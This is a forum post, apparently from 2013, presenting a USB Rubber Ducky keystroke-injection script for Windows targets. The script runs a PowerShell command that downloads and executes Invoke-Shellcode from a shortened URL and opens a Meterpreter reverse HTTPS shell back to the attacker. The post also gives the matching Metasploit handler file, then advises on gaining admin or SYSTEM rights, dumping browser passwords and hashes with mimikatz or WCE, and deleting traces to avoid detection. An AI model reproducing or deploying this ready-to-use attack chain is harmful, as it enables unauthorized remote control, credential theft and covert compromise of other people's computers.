Xcellerator Posted September 26, 2013 Share Posted September 26, 2013 Hey guys, I've been playing around with powershell and also been looking into Powersploit (I really suggest you look into powersploit - its got some amazing stuff in it!). Anyway, I came across this: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/, and I thought it would work great as a ducky script! First, here is the actual Duckyscript code you need to run on the target machine, ONLY AFTER setting up the listener in metasploit below. DELAY 5000 GUI r DELAY 500 STRING cmd ENTER STRING cd %TEMP% ENTER STRING copy con met.cmd ENTER STRING start C:/Windows/System32/Ribbons.scr /s ENTER STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force" ENTER CTRL z ENTER DELAY 100 STRING met.cmd && exit ENTER Just make sure you remember to change <IP_ADDRESS> to your actual IP Address and <PORT> to the port you want to run the session over. Now, in a terminal window in a linux distro (make sure you have metasploit installed), make a file with this as it's contents, obviously changing the values in < and > to match your settings: use exploit/multi/handler set payload windows/meterpreter/reverse_https set LHOST <IP_ADDRESS> set LPORT <PORT> exploit -j -z name it whatever you want with a .rc extension. ### MAKE SURE YOU DO THIS BEFORE YOU EXECUTE THE PAYLOAD ON THE MACHINE! IT IS A REVERSE SHELL, NOT A BIND SHELL### Run this in the terminal: msfconsole -r ./fileyoujustmade.rc Let everything start up and ensure there are no errors. (You might get an error with a port already being in use on your machine, or permissions problems if you try and use port 443 on Debian systems without being root). Now, run the payload from the ducky on the target machine. Once you see the screensaver appear, you're good to remove the Ducky. It may take up to 10 seconds for you to receive your shell as it has to connect out to the internet to load the Invoke-Shellcode plugin and then actually generate and load the meterpreter into memory. Issues I occured: I found that my metasploit just sat at "Meterpreter shell 1 opened at....". This could be because it attempts to automatically run the smart_migrate module upon connection. All I did to resolve this was to hit enter to get the msf prompt back, and then connect into the meterpreter session and run smart_migrate automatically. Smart_migrate can be found at post/windows/manage/smart_migrate in the metasploit trunk. Although, be warned - smart_migrate automatically attempts to migrate into explorer.exe which ##DOES NOT## have an administrative privileges. So, you'll have to utilise the post modules to grant yourself admin and eventually even SYSTEM (If you want to dump firefox/chrome/IE passwords, hashes or use mimikatz or WCE to get the wDigest passwords from memory). I'd recommend the bypass_uac or ask modules to grab yourself admin - particularly ask in lower security environments. For the Forensics Conscious: If you're concerned about remaining undetected on the machine you've got the shell on, then I recommend the following steps: 1. Delete met.cmd from %TEMP% - You don't want to come back to bite you on the ass once you're done with the machine. 2. Kill the powershell.exe process once you've migrated out of it. Hope you all enjoy! I know many of you will find good use of this, and as always - use responsibly! ;-P Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.